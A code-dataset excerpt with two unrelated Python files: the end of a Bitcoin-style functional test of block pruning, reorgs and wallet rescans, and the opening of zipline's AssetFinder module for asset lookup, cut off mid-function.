        self.nodes.append(start_node(4, self.options.tmpdir, ["-debug=0","-maxreceivebuffer=20000","-blockmaxsize=999000"], timewait=900))

        # Create nodes 5 to test wallet in prune mode, but do not connect
        self.nodes.append(start_node(5, self.options.tmpdir, ["-debug=0", "-prune=550"]))

        # Determine default relay fee
        self.relayfee = self.nodes[0].getnetworkinfo()["relayfee"]

        connect_nodes(self.nodes[0], 1)
        connect_nodes(self.nodes[1], 2)
        connect_nodes(self.nodes[2], 0)
        connect_nodes(self.nodes[0], 3)
        connect_nodes(self.nodes[0], 4)
        sync_blocks(self.nodes[0:5])

    def create_big_chain(self):
        """Mine a 995-block chain whose block files exceed the 550MiB target."""
        # Start by creating some coinbases we can spend later
        self.nodes[1].generate(200)
        sync_blocks(self.nodes[0:2])
        self.nodes[0].generate(150)
        # Then mine enough full blocks to create more than 550MiB of data
        for i in range(645):
            mine_large_block(self.nodes[0], self.utxo_cache_0)
        sync_blocks(self.nodes[0:5])

    def test_height_min(self):
        """Check pruning stays off below PruneAfterHeight, then kicks in."""
        if not os.path.isfile(self.prunedir+"blk00000.dat"):
            raise AssertionError("blk00000.dat is missing, pruning too early")
        print("Success")
        print("Though we're already using more than 550MiB, current usage:", calc_usage(self.prunedir))
        print("Mining 25 more blocks should cause the first block file to be pruned")
        # Pruning doesn't run until we're allocating another chunk, 20 full blocks past the height cutoff will ensure this
        for i in range(25):
            mine_large_block(self.nodes[0], self.utxo_cache_0)

        waitstart = time.time()
        # Poll until the first block file disappears; fail after 30s.
        while os.path.isfile(self.prunedir+"blk00000.dat"):
            time.sleep(0.1)
            if time.time() - waitstart > 30:
                raise AssertionError("blk00000.dat not pruned when it should be")

        print("Success")
        usage = calc_usage(self.prunedir)
        print("Usage should be below target:", usage)
        if (usage > 550):
            raise AssertionError("Pruning target not being met")

    def create_chain_with_staleblocks(self):
        """Generate 12 rounds of 24-block stale forks reorged by 25-block chains."""
        # Create stale blocks in manageable sized chunks
        print("Mine 24 (stale) blocks on Node 1, followed by 25 (main chain) block reorg from Node 0, for 12 rounds")

        for j in range(12):
            # Disconnect node 0 so it can mine a longer reorg chain without knowing about node 1's soon-to-be-stale chain
            # Node 2 stays connected, so it hears about the stale blocks and then reorg's when node0 reconnects
            # Stopping node 0 also clears its mempool, so it doesn't have node1's transactions to accidentally mine
            self.stop_node(0)
            self.nodes[0]=start_node(0, self.options.tmpdir, ["-debug","-maxreceivebuffer=20000","-blockmaxsize=999000", "-checkblocks=5"], timewait=900)
            # Mine 24 blocks in node 1
            for i in range(24):
                if j == 0:
                    mine_large_block(self.nodes[1], self.utxo_cache_1)
                else:
                    self.nodes[1].generate(1) #tx's already in mempool from previous disconnects

            # Reorg back with 25 block chain from node 0
            for i in range(25):
                mine_large_block(self.nodes[0], self.utxo_cache_0)

            # Create connections in the order so both nodes can see the reorg at the same time
            connect_nodes(self.nodes[1], 0)
            connect_nodes(self.nodes[2], 0)
            sync_blocks(self.nodes[0:3])

        print("Usage can be over target because of high stale rate:", calc_usage(self.prunedir))

    def reorg_test(self):
        """Force a 288-block-deep reorg on node 2; return (forkheight, forkhash)."""
        # Node 1 will mine a 300 block chain starting 287 blocks back from Node 0 and Node 2's tip
        # This will cause Node 2 to do a reorg requiring 288 blocks of undo data to the reorg_test chain
        # Reboot node 1 to clear its mempool (hopefully make the invalidate faster)
        # Lower the block max size so we don't keep mining all our big mempool transactions (from disconnected blocks)
        self.stop_node(1)
        self.nodes[1]=start_node(1, self.options.tmpdir, ["-debug","-maxreceivebuffer=20000","-blockmaxsize=5000", "-checkblocks=5", "-disablesafemode"], timewait=900)

        height = self.nodes[1].getblockcount()
        print("Current block height:", height)

        invalidheight = height-287
        badhash = self.nodes[1].getblockhash(invalidheight)
        print("Invalidating block at height:",invalidheight,badhash)
        self.nodes[1].invalidateblock(badhash)

        # We've now switched to our previously mined-24 block fork on node 1, but that's not what we want
        # So invalidate that fork as well, until we're on the same chain as node 0/2 (but at an ancestor 288 blocks ago)
        mainchainhash = self.nodes[0].getblockhash(invalidheight - 1)
        curhash = self.nodes[1].getblockhash(invalidheight - 1)
        while curhash != mainchainhash:
            self.nodes[1].invalidateblock(curhash)
            curhash = self.nodes[1].getblockhash(invalidheight - 1)

        assert(self.nodes[1].getblockcount() == invalidheight - 1)
        print("New best height", self.nodes[1].getblockcount())

        # Reboot node1 to clear those giant tx's from mempool
        self.stop_node(1)
        self.nodes[1]=start_node(1, self.options.tmpdir, ["-debug","-maxreceivebuffer=20000","-blockmaxsize=5000", "-checkblocks=5", "-disablesafemode"], timewait=900)

        print("Generating new longer chain of 300 more blocks")
        self.nodes[1].generate(300)

        print("Reconnect nodes")
        connect_nodes(self.nodes[0], 1)
        connect_nodes(self.nodes[2], 1)
        sync_blocks(self.nodes[0:3], timeout=120)

        print("Verify height on node 2:",self.nodes[2].getblockcount())
        print("Usage possibly still high bc of stale blocks in block files:", calc_usage(self.prunedir))

        print("Mine 220 more blocks so we have requisite history (some blocks will be big and cause pruning of previous chain)")
        for i in range(22):
            # This can be slow, so do this in multiple RPC calls to avoid
            # RPC timeouts.
            self.nodes[0].generate(10) #node 0 has many large tx's in its mempool from the disconnects
        sync_blocks(self.nodes[0:3], timeout=300)

        usage = calc_usage(self.prunedir)
        print("Usage should be below target:", usage)
        if (usage > 550):
            raise AssertionError("Pruning target not being met")

        return invalidheight,badhash

    def reorg_back(self):
        """Verify node 2 can redownload a pruned block to reorg back to main chain."""
        # Verify that a block on the old main chain fork has been pruned away
        try:
            self.nodes[2].getblock(self.forkhash)
            raise AssertionError("Old block wasn't pruned so can't test redownload")
        except JSONRPCException as e:
            print("Will need to redownload block",self.forkheight)

        # Verify that we have enough history to reorg back to the fork point
        # Although this is more than 288 blocks, because this chain was written more recently
        # and only its other 299 small and 220 large block are in the block files after it,
        # its expected to still be retained
        self.nodes[2].getblock(self.nodes[2].getblockhash(self.forkheight))

        first_reorg_height = self.nodes[2].getblockcount()
        curchainhash = self.nodes[2].getblockhash(self.mainchainheight)
        self.nodes[2].invalidateblock(curchainhash)
        goalbestheight = self.mainchainheight
        goalbesthash = self.mainchainhash2

        # As of 0.10 the current block download logic is not able to reorg to the original chain created in
        # create_chain_with_stale_blocks because it doesn't know of any peer that's on that chain from which to
        # redownload its missing blocks.
        # Invalidate the reorg_test chain in node 0 as well, it can successfully switch to the original chain
        # because it has all the block data.
        # However it must mine enough blocks to have a more work chain than the reorg_test chain in order
        # to trigger node 2's block download logic.
        # At this point node 2 is within 288 blocks of the fork point so it will preserve its ability to reorg
        if self.nodes[2].getblockcount() < self.mainchainheight:
            blocks_to_mine = first_reorg_height + 1 - self.mainchainheight
            print("Rewind node 0 to prev main chain to mine longer chain to trigger redownload. Blocks needed:", blocks_to_mine)
            self.nodes[0].invalidateblock(curchainhash)
            assert(self.nodes[0].getblockcount() == self.mainchainheight)
            assert(self.nodes[0].getbestblockhash() == self.mainchainhash2)
            goalbesthash = self.nodes[0].generate(blocks_to_mine)[-1]
            goalbestheight = first_reorg_height + 1

        print("Verify node 2 reorged back to the main chain, some blocks of which it had to redownload")
        waitstart = time.time()
        while self.nodes[2].getblockcount() < goalbestheight:
            time.sleep(0.1)
            if time.time() - waitstart > 900:
                raise AssertionError("Node 2 didn't reorg to proper height")
        assert(self.nodes[2].getbestblockhash() == goalbesthash)

        # Verify we can now have the data for a block previously pruned
        assert(self.nodes[2].getblock(self.forkhash)["height"] == self.forkheight)

    def manual_test(self, node_number, use_timestamp):
        """Exercise the pruneblockchain RPC on one node.

        When use_timestamp is True, prune heights are expressed as block
        timestamps (shifted by RESCAN_WINDOW) instead of raw heights.
        """
        # at this point, node has 995 blocks and has not yet run in prune mode
        node = self.nodes[node_number] = start_node(node_number, self.options.tmpdir, ["-debug=0"], timewait=900)
        assert_equal(node.getblockcount(), 995)
        assert_raises_message(JSONRPCException, "not in prune mode", node.pruneblockchain, 500)
        self.stop_node(node_number)

        # now re-start in manual pruning mode
        node = self.nodes[node_number] = start_node(node_number, self.options.tmpdir, ["-debug=0","-prune=1"], timewait=900)
        assert_equal(node.getblockcount(), 995)

        def height(index):
            # Translate a block index into the argument pruneblockchain expects.
            if use_timestamp:
                return node.getblockheader(node.getblockhash(index))["time"] + RESCAN_WINDOW
            else:
                return index

        def prune(index, expected_ret=None):
            ret = node.pruneblockchain(height(index))
            # Check the return value. When use_timestamp is True, just check
            # that the return value is less than or equal to the expected
            # value, because when more than one block is generated per second,
            # a timestamp will not be granular enough to uniquely identify an
            # individual block.
            if expected_ret is None:
                expected_ret = index
            if use_timestamp:
                assert_greater_than(ret, 0)
                assert_greater_than(expected_ret + 1, ret)
            else:
                assert_equal(ret, expected_ret)

        def has_block(index):
            # True if block file blk{index:05}.dat still exists on disk.
            return os.path.isfile(self.options.tmpdir + "/node{}/regtest/blocks/blk{:05}.dat".format(node_number, index))

        # should not prune because chain tip of node 3 (995) < PruneAfterHeight (1000)
        assert_raises_message(JSONRPCException, "Blockchain is too short for pruning", node.pruneblockchain, height(500))

        # mine 6 blocks so we are at height 1001 (i.e., above PruneAfterHeight)
        node.generate(6)
        assert_equal(node.getblockchaininfo()["blocks"], 1001)

        # negative heights should raise an exception
        assert_raises_message(JSONRPCException, "Negative", node.pruneblockchain, -10)

        # height=100 too low to prune first block file so this is a no-op
        prune(100)
        if not has_block(0):
            raise AssertionError("blk00000.dat is missing when should still be there")

        # Does nothing
        node.pruneblockchain(height(0))
        if not has_block(0):
            raise AssertionError("blk00000.dat is missing when should still be there")

        # height=500 should prune first file
        prune(500)
        if has_block(0):
            raise AssertionError("blk00000.dat is still there, should be pruned by now")
        if not has_block(1):
            raise AssertionError("blk00001.dat is missing when should still be there")

        # height=650 should prune second file
        prune(650)
        if has_block(1):
            raise AssertionError("blk00001.dat is still there, should be pruned by now")

        # height=1000 should not prune anything more, because tip-288 is in blk00002.dat.
        # NOTE(review): the error string below looks copy-pasted from the
        # "pruned" branch; the condition actually checks the file still exists.
        prune(1000, 1001 - MIN_BLOCKS_TO_KEEP)
        if not has_block(2):
            raise AssertionError("blk00002.dat is still there, should be pruned by now")

        # advance the tip so blk00002.dat and blk00003.dat can be pruned (the last 288 blocks should now be in blk00004.dat)
        node.generate(288)
        prune(1000)
        if has_block(2):
            raise AssertionError("blk00002.dat is still there, should be pruned by now")
        if has_block(3):
            raise AssertionError("blk00003.dat is still there, should be pruned by now")

        # stop node, start back up with auto-prune at 550MB, make sure still runs
        self.stop_node(node_number)
        self.nodes[node_number] = start_node(node_number, self.options.tmpdir, ["-debug=0","-prune=550"], timewait=900)

        print("Success")

    def wallet_test(self):
        """Check the wallet survives restarts (and rescans) on pruned nodes."""
        # check that the pruning node's wallet is still in good shape
        print("Stop and start pruning node to trigger wallet rescan")
        try:
            self.stop_node(2)
            start_node(2, self.options.tmpdir, ["-debug=1","-prune=550"])
            print("Success")
        except Exception as detail:
            raise AssertionError("Wallet test: unable to re-start the pruning node")

        # check that wallet loads successfully when restarting a pruned node after IBD.
        # this was reported to fail in #7494.
        print ("Syncing node 5 to test wallet")
        connect_nodes(self.nodes[0], 5)
        nds = [self.nodes[0], self.nodes[5]]
        sync_blocks(nds, wait=5, timeout=300)
        try:
            self.stop_node(5) #stop and start to trigger rescan
            start_node(5, self.options.tmpdir, ["-debug=1","-prune=550"])
            print ("Success")
        except Exception as detail:
            raise AssertionError("Wallet test: unable to re-start node5")

    def run_test(self):
        """Top-level scenario; see the inline chain diagrams for the topology."""
        print("Warning! This test requires 4GB of disk space and takes over 30 mins (up to 2 hours)")
        print("Mining a big blockchain of 995 blocks")
        self.create_big_chain()
        # Chain diagram key:
        # *   blocks on main chain
        # +,&,$,@ blocks on other forks
        # X   invalidated block
        # N1  Node 1
        #
        # Start by mining a simple chain that all nodes have
        # N0=N1=N2 **...*(995)

        # stop manual-pruning node with 995 blocks
        self.stop_node(3)
        self.stop_node(4)

        print("Check that we haven't started pruning yet because we're below PruneAfterHeight")
        self.test_height_min()
        # Extend this chain past the PruneAfterHeight
        # N0=N1=N2 **...*(1020)

        print("Check that we'll exceed disk space target if we have a very high stale block rate")
        self.create_chain_with_staleblocks()
        # Disconnect N0
        # And mine a 24 block chain on N1 and a separate 25 block chain on N0
        # N1=N2 **...*+...+(1044)
        # N0    **...**...**(1045)
        #
        # reconnect nodes causing reorg on N1 and N2
        # N1=N2 **...*(1020) *...**(1045)
        #                   \
        #                    +...+(1044)
        #
        # repeat this process until you have 12 stale forks hanging off the
        # main chain on N1 and N2
        # N0    *************************...***************************(1320)
        #
        # N1=N2 **...*(1020) *...**(1045) *..         ..**(1295) *...**(1320)
        #                   \            \                      \
        #                    +...+(1044)  &..                    $...$(1319)

        # Save some current chain state for later use
        self.mainchainheight = self.nodes[2].getblockcount()   #1320
        self.mainchainhash2 = self.nodes[2].getblockhash(self.mainchainheight)

        print("Check that we can survive a 288 block reorg still")
        (self.forkheight,self.forkhash) = self.reorg_test() #(1033, )
        # Now create a 288 block reorg by mining a longer chain on N1
        # First disconnect N1
        # Then invalidate 1033 on main chain and 1032 on fork so height is 1032 on main chain
        # N1   **...*(1020) **...**(1032)X..
        #                  \
        #                   ++...+(1031)X..
        #
        # Now mine 300 more blocks on N1
        # N1    **...*(1020) **...**(1032) @@...@(1332)
        #                 \               \
        #                  \               X...
        #                   \                 \
        #                    ++...+(1031)X..   ..
        #
        # Reconnect nodes and mine 220 more blocks on N1
        # N1    **...*(1020) **...**(1032) @@...@@@(1552)
        #                 \               \
        #                  \               X...
        #                   \                 \
        #                    ++...+(1031)X..   ..
        #
        # N2    **...*(1020) **...**(1032) @@...@@@(1552)
        #                 \               \
        #                  \               *...**(1320)
        #                   \                 \
        #                    ++...++(1044)     ..
        #
        # N0    ********************(1032) @@...@@@(1552)
        #                                 \
        #                                  *...**(1320)

        print("Test that we can rerequest a block we previously pruned if needed for a reorg")
        self.reorg_back()
        # Verify that N2 still has block 1033 on current chain (@), but not on main chain (*)
        # Invalidate 1033 on current chain (@) on N2 and we should be able to reorg to
        # original main chain (*), but will require redownload of some blocks
        # In order to have a peer we think we can download from, must also perform this invalidation
        # on N0 and mine a new longest chain to trigger.
        # Final result:
        # N0    ********************(1032) **...****(1553)
        #                                 \
        #                                  X@...@@@(1552)
        #
        # N2    **...*(1020) **...**(1032) **...****(1553)
        #                 \               \
        #                  \               X@...@@@(1552)
        #                   \
        #                    +..
        #
        # N1 doesn't change because 1033 on main chain (*) is invalid

        print("Test manual pruning with block indices")
        self.manual_test(3, use_timestamp=False)

        print("Test manual pruning with timestamps")
        self.manual_test(4, use_timestamp=True)

        print("Test wallet re-scan")
        self.wallet_test()

        print("Done")
# Script entry point: run the pruning functional test directly.
if __name__ == '__main__':
    PruneTest().main()
| 47.284768 | 167 | 0.603455 |
ace8d02dd9a9e65bfbfbae438c3654b0674bb2ab | 46,983 | py | Python | zipline/assets/assets.py | hebpmo/zipline | 396469b29e7e0daea4fe1e8a1c18f6c7eeb92780 | [
"Apache-2.0"
] | 4 | 2018-11-17T20:04:53.000Z | 2021-12-10T14:47:30.000Z | zipline/assets/assets.py | t330883522/zipline | 396469b29e7e0daea4fe1e8a1c18f6c7eeb92780 | [
"Apache-2.0"
] | null | null | null | zipline/assets/assets.py | t330883522/zipline | 396469b29e7e0daea4fe1e8a1c18f6c7eeb92780 | [
"Apache-2.0"
] | 3 | 2018-11-17T20:04:50.000Z | 2020-03-01T11:11:41.000Z | # Copyright 2016 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from abc import ABCMeta
import array
import binascii
from collections import deque, namedtuple
from functools import partial
from numbers import Integral
from operator import itemgetter, attrgetter
import struct
from logbook import Logger
import numpy as np
import pandas as pd
from pandas import isnull
from six import with_metaclass, string_types, viewkeys, iteritems
import sqlalchemy as sa
from toolz import (
compose,
concat,
concatv,
curry,
merge,
partition_all,
sliding_window,
valmap,
)
from toolz.curried import operator as op
from zipline.errors import (
EquitiesNotFound,
FutureContractsNotFound,
MapAssetIdentifierIndexError,
MultipleSymbolsFound,
MultipleValuesFoundForField,
MultipleValuesFoundForSid,
NoValueForSid,
ValueNotFoundForField,
SidsNotFound,
SymbolNotFound,
)
from . import (
Asset, Equity, Future,
)
from . continuous_futures import (
ADJUSTMENT_STYLES,
CHAIN_PREDICATES,
ContinuousFuture,
OrderedContracts,
)
from .asset_writer import (
check_version_info,
split_delimited_symbol,
asset_db_table_names,
symbol_columns,
SQLITE_MAX_VARIABLE_NUMBER,
)
from .asset_db_schema import (
ASSET_DB_VERSION
)
from zipline.utils.functional import invert
from zipline.utils.memoize import lazyval
from zipline.utils.numpy_utils import as_column
from zipline.utils.preprocess import preprocess
from zipline.utils.sqlite_utils import group_into_chunks, coerce_string_to_eng
log = Logger('assets.py')
# A set of fields that need to be converted to strings before building an
# Asset to avoid unicode fields
_asset_str_fields = frozenset({
'symbol',
'asset_name',
'exchange',
})
# A set of fields that need to be converted to timestamps in UTC
_asset_timestamp_fields = frozenset({
'start_date',
'end_date',
'first_traded',
'notice_date',
'expiration_date',
'auto_close_date',
})
OwnershipPeriod = namedtuple('OwnershipPeriod', 'start end sid value')
def merge_ownership_periods(mappings):
    """
    Given a dict of mappings where the values are lists of
    OwnershipPeriod objects, returns a dict with the same structure with
    new OwnershipPeriod objects adjusted so that the periods have no
    gaps.
    Orders the periods chronologically, and pushes forward the end date
    of each period to match the start date of the following period. The
    end date of the last period pushed forward to the max Timestamp.

    Parameters
    ----------
    mappings : dict[any -> list[OwnershipPeriod]]
        Raw ownership periods, possibly unsorted and with gaps between
        consecutive periods.

    Returns
    -------
    merged : dict[any -> tuple[OwnershipPeriod]]
        Same keys as ``mappings``; each value is a chronologically sorted,
        gapless tuple of OwnershipPeriods.
    """
    return valmap(
        lambda v: tuple(
            # For each adjacent pair (a, b), a's end date becomes b's start
            # date, which is what removes the gaps.
            OwnershipPeriod(
                a.start,
                b.start,
                a.sid,
                a.value,
            ) for a, b in sliding_window(
                2,
                concatv(
                    sorted(v),
                    # concat with a fake ownership object to make the last
                    # end date be max timestamp
                    [OwnershipPeriod(
                        pd.Timestamp.max.tz_localize('utc'),
                        None,
                        None,
                        None,
                    )],
                ),
            )
        ),
        mappings,
    )
def build_ownership_map(table, key_from_row, value_from_row):
"""
Builds a dict mapping to lists of OwnershipPeriods, from a db table.
"""
rows = sa.select(table.c).execute().fetchall()
mappings = {}
for row in rows:
mappings.setdefault(
key_from_row(row),
[],
).append(
OwnershipPeriod(
pd.Timestamp(row.start_date, unit='ns', tz='utc'),
pd.Timestamp(row.end_date, unit='ns', tz='utc'),
row.sid,
value_from_row(row),
),
)
return merge_ownership_periods(mappings)
@curry
def _filter_kwargs(names, dict_):
    """Filter out kwargs from a dictionary.
    Parameters
    ----------
    names : set[str]
        The names to select from ``dict_``.
    dict_ : dict[str, any]
        The dictionary to select from.
    Returns
    -------
    kwargs : dict[str, any]
        ``dict_`` where the keys intersect with ``names`` and the values are
        not None.
    """
    # Keep only keys that are both requested and bound to a real value.
    selected = {}
    for key, value in dict_.items():
        if key in names and value is not None:
            selected[key] = value
    return selected
# Curried specializations used when constructing Future/Equity instances
# from raw database rows.
_filter_future_kwargs = _filter_kwargs(Future._kwargnames)
_filter_equity_kwargs = _filter_kwargs(Equity._kwargnames)
def _convert_asset_timestamp_fields(dict_):
    """
    Takes in a dict of Asset init args and converts dates to pd.Timestamps

    Mutates ``dict_`` in place and also returns it. Any date field that
    converts to NaT is replaced with None so Asset constructors see a
    clean "no value" sentinel instead of a NaT Timestamp.
    """
    # Only touch the keys that are known timestamp fields and actually
    # present in this particular dict.
    for key in _asset_timestamp_fields & viewkeys(dict_):
        value = pd.Timestamp(dict_[key], tz='UTC')
        dict_[key] = None if isnull(value) else value
    return dict_
# Identifiers for the "asset type" byte of an encoded sid.
SID_TYPE_IDS = {
    # Asset would be 0,
    ContinuousFuture: 1,
}
# Identifiers for the roll-style byte of an encoded sid.
CONTINUOUS_FUTURE_ROLL_STYLE_IDS = {
    'calendar': 0,
    'volume': 1,
}
# Identifiers for the adjustment-style byte of an encoded sid.
CONTINUOUS_FUTURE_ADJUSTMENT_STYLE_IDS = {
    None: 0,
    'div': 1,
    'add': 2,
}
def _encode_continuous_future_sid(root_symbol,
                                  offset,
                                  roll_style,
                                  adjustment_style):
    """Pack a continuous future's identifying fields into a synthetic int sid.

    Byte layout (8 bytes total, read as a big-endian hex integer):
      1 byte  - sid type (always the ContinuousFuture id)
      2 bytes - root symbol, as two ASCII codes
      1 byte  - offset (could be packed smaller since offsets of greater
                than 12 are probably unneeded)
      1 byte  - roll style id
      1 byte  - adjustment style id
      2 bytes - empty space left for parameterized roll types

    The root symbol currently supports 2 characters. If 3 char root symbols
    are needed, the size of the root symbol does not need to change, however
    writing the string directly will need to change to a scheme of writing
    the A-Z values in 5-bit chunks.
    """
    layout = struct.Struct("B 2B B B B 2B")
    buf = array.array('B', [0] * layout.size)
    symbol_bytes = bytearray(root_symbol, 'ascii')
    layout.pack_into(
        buf,
        0,
        SID_TYPE_IDS[ContinuousFuture],
        symbol_bytes[0],
        symbol_bytes[1],
        offset,
        CONTINUOUS_FUTURE_ROLL_STYLE_IDS[roll_style],
        CONTINUOUS_FUTURE_ADJUSTMENT_STYLE_IDS[adjustment_style],
        0,
        0,
    )
    # Interpret the packed bytes as one big hex integer.
    return int(binascii.hexlify(buf), 16)
class AssetFinder(object):
"""
An AssetFinder is an interface to a database of Asset metadata written by
an ``AssetDBWriter``.
This class provides methods for looking up assets by unique integer id or
by symbol. For historical reasons, we refer to these unique ids as 'sids'.
Parameters
----------
engine : str or SQLAlchemy.engine
An engine with a connection to the asset database to use, or a string
that can be parsed by SQLAlchemy as a URI.
future_chain_predicates : dict
A dict mapping future root symbol to a predicate function which accepts
a contract as a parameter and returns whether or not the contract should be
included in the chain.
See Also
--------
:class:`zipline.assets.AssetDBWriter`
"""
# Token used as a substitute for pickling objects that contain a
# reference to an AssetFinder.
PERSISTENT_TOKEN = "<AssetFinder>"
@preprocess(engine=coerce_string_to_eng(require_exists=True))
def __init__(self, engine, future_chain_predicates=CHAIN_PREDICATES):
self.engine = engine
metadata = sa.MetaData(bind=engine)
metadata.reflect(only=asset_db_table_names)
for table_name in asset_db_table_names:
setattr(self, table_name, metadata.tables[table_name])
# Check the version info of the db for compatibility
check_version_info(engine, self.version_info, ASSET_DB_VERSION)
# Cache for lookup of assets by sid, the objects in the asset lookup
# may be shared with the results from equity and future lookup caches.
#
# The top level cache exists to minimize lookups on the asset type
# routing.
#
# The caches are read through, i.e. accessing an asset through
# retrieve_asset will populate the cache on first retrieval.
self._caches = (self._asset_cache, self._asset_type_cache) = {}, {}
self._future_chain_predicates = future_chain_predicates \
if future_chain_predicates is not None else {}
self._ordered_contracts = {}
# Populated on first call to `lifetimes`.
self._asset_lifetimes = None
def _reset_caches(self):
"""
Reset our asset caches.
You probably shouldn't call this method.
"""
# This method exists as a workaround for the in-place mutating behavior
# of `TradingAlgorithm._write_and_map_id_index_to_sids`. No one else
# should be calling this.
for cache in self._caches:
cache.clear()
self.reload_symbol_maps()
def reload_symbol_maps(self):
"""Clear the in memory symbol lookup maps.
This will make any changes to the underlying db available to the
symbol maps.
"""
# clear the lazyval caches, the next access will requery
try:
del type(self).symbol_ownership_map[self]
except KeyError:
pass
try:
del type(self).fuzzy_symbol_ownership_map[self]
except KeyError:
pass
try:
del type(self).equity_supplementary_map[self]
except KeyError:
pass
try:
del type(self).equity_supplementary_map_by_sid[self]
except KeyError:
pass
@lazyval
def symbol_ownership_map(self):
return build_ownership_map(
table=self.equity_symbol_mappings,
key_from_row=(
lambda row: (row.company_symbol, row.share_class_symbol)
),
value_from_row=lambda row: row.symbol,
)
@lazyval
def fuzzy_symbol_ownership_map(self):
fuzzy_mappings = {}
for (cs, scs), owners in iteritems(self.symbol_ownership_map):
fuzzy_owners = fuzzy_mappings.setdefault(
cs + scs,
[],
)
fuzzy_owners.extend(owners)
fuzzy_owners.sort()
return fuzzy_mappings
@lazyval
def equity_supplementary_map(self):
return build_ownership_map(
table=self.equity_supplementary_mappings,
key_from_row=lambda row: (row.field, row.value),
value_from_row=lambda row: row.value,
)
@lazyval
def equity_supplementary_map_by_sid(self):
return build_ownership_map(
table=self.equity_supplementary_mappings,
key_from_row=lambda row: (row.field, row.sid),
value_from_row=lambda row: row.value,
)
def lookup_asset_types(self, sids):
"""
Retrieve asset types for a list of sids.
Parameters
----------
sids : list[int]
Returns
-------
types : dict[sid -> str or None]
Asset types for the provided sids.
"""
found = {}
missing = set()
for sid in sids:
try:
found[sid] = self._asset_type_cache[sid]
except KeyError:
missing.add(sid)
if not missing:
return found
router_cols = self.asset_router.c
for assets in group_into_chunks(missing):
query = sa.select((router_cols.sid, router_cols.asset_type)).where(
self.asset_router.c.sid.in_(map(int, assets))
)
for sid, type_ in query.execute().fetchall():
missing.remove(sid)
found[sid] = self._asset_type_cache[sid] = type_
for sid in missing:
found[sid] = self._asset_type_cache[sid] = None
return found
def group_by_type(self, sids):
"""
Group a list of sids by asset type.
Parameters
----------
sids : list[int]
Returns
-------
types : dict[str or None -> list[int]]
A dict mapping unique asset types to lists of sids drawn from sids.
If we fail to look up an asset, we assign it a key of None.
"""
return invert(self.lookup_asset_types(sids))
def retrieve_asset(self, sid, default_none=False):
"""
Retrieve the Asset for a given sid.
"""
try:
asset = self._asset_cache[sid]
if asset is None and not default_none:
raise SidsNotFound(sids=[sid])
return asset
except KeyError:
return self.retrieve_all((sid,), default_none=default_none)[0]
def retrieve_all(self, sids, default_none=False):
"""
Retrieve all assets in `sids`.
Parameters
----------
sids : iterable of int
Assets to retrieve.
default_none : bool
If True, return None for failed lookups.
If False, raise `SidsNotFound`.
Returns
-------
assets : list[Asset or None]
A list of the same length as `sids` containing Assets (or Nones)
corresponding to the requested sids.
Raises
------
SidsNotFound
When a requested sid is not found and default_none=False.
"""
hits, missing, failures = {}, set(), []
for sid in sids:
try:
asset = self._asset_cache[sid]
if not default_none and asset is None:
# Bail early if we've already cached that we don't know
# about an asset.
raise SidsNotFound(sids=[sid])
hits[sid] = asset
except KeyError:
missing.add(sid)
# All requests were cache hits. Return requested sids in order.
if not missing:
return [hits[sid] for sid in sids]
update_hits = hits.update
# Look up cache misses by type.
type_to_assets = self.group_by_type(missing)
# Handle failures
failures = {failure: None for failure in type_to_assets.pop(None, ())}
update_hits(failures)
self._asset_cache.update(failures)
if failures and not default_none:
raise SidsNotFound(sids=list(failures))
# We don't update the asset cache here because it should already be
# updated by `self.retrieve_equities`.
update_hits(self.retrieve_equities(type_to_assets.pop('equity', ())))
update_hits(
self.retrieve_futures_contracts(type_to_assets.pop('future', ()))
)
# We shouldn't know about any other asset types.
if type_to_assets:
raise AssertionError(
"Found asset types: %s" % list(type_to_assets.keys())
)
return [hits[sid] for sid in sids]
def retrieve_equities(self, sids):
"""
Retrieve Equity objects for a list of sids.
Users generally shouldn't need to this method (instead, they should
prefer the more general/friendly `retrieve_assets`), but it has a
documented interface and tests because it's used upstream.
Parameters
----------
sids : iterable[int]
Returns
-------
equities : dict[int -> Equity]
Raises
------
EquitiesNotFound
When any requested asset isn't found.
"""
return self._retrieve_assets(sids, self.equities, Equity)
def _retrieve_equity(self, sid):
return self.retrieve_equities((sid,))[sid]
    def retrieve_futures_contracts(self, sids):
        """
        Retrieve Future objects for an iterable of sids.
        Users generally shouldn't need to use this method (instead, they
        should prefer the more general/friendly `retrieve_assets`), but it
        has a documented interface and tests because it's used upstream.
        Parameters
        ----------
        sids : iterable[int]
        Returns
        -------
        futures : dict[int -> Future]
        Raises
        ------
        FutureContractsNotFound
            When any requested asset isn't found.
        """
        return self._retrieve_assets(sids, self.futures_contracts, Future)
@staticmethod
def _select_assets_by_sid(asset_tbl, sids):
return sa.select([asset_tbl]).where(
asset_tbl.c.sid.in_(map(int, sids))
)
@staticmethod
def _select_asset_by_symbol(asset_tbl, symbol):
return sa.select([asset_tbl]).where(asset_tbl.c.symbol == symbol)
def _select_most_recent_symbols_chunk(self, sid_group):
"""Retrieve the most recent symbol for a set of sids.
Parameters
----------
sid_group : iterable[int]
The sids to lookup. The length of this sequence must be less than
or equal to SQLITE_MAX_VARIABLE_NUMBER because the sids will be
passed in as sql bind params.
Returns
-------
sel : Selectable
The sqlalchemy selectable that will query for the most recent
symbol for each sid.
Notes
-----
This is implemented as an inner select of the columns of interest
ordered by the end date of the (sid, symbol) mapping. We then group
that inner select on the sid with no aggregations to select the last
row per group which gives us the most recently active symbol for all
of the sids.
"""
symbol_cols = self.equity_symbol_mappings.c
inner = sa.select(
(symbol_cols.sid,) +
tuple(map(
op.getitem(symbol_cols),
symbol_columns,
)),
).where(
symbol_cols.sid.in_(map(int, sid_group)),
).order_by(
symbol_cols.end_date.asc(),
)
return sa.select(inner.c).group_by(inner.c.sid)
def _lookup_most_recent_symbols(self, sids):
symbols = {
row.sid: {c: row[c] for c in symbol_columns}
for row in concat(
self.engine.execute(
self._select_most_recent_symbols_chunk(sid_group),
).fetchall()
for sid_group in partition_all(
SQLITE_MAX_VARIABLE_NUMBER,
sids
)
)
}
if len(symbols) != len(sids):
raise EquitiesNotFound(
sids=set(sids) - set(symbols),
plural=True,
)
return symbols
def _retrieve_asset_dicts(self, sids, asset_tbl, querying_equities):
if not sids:
return
if querying_equities:
def mkdict(row,
symbols=self._lookup_most_recent_symbols(sids)):
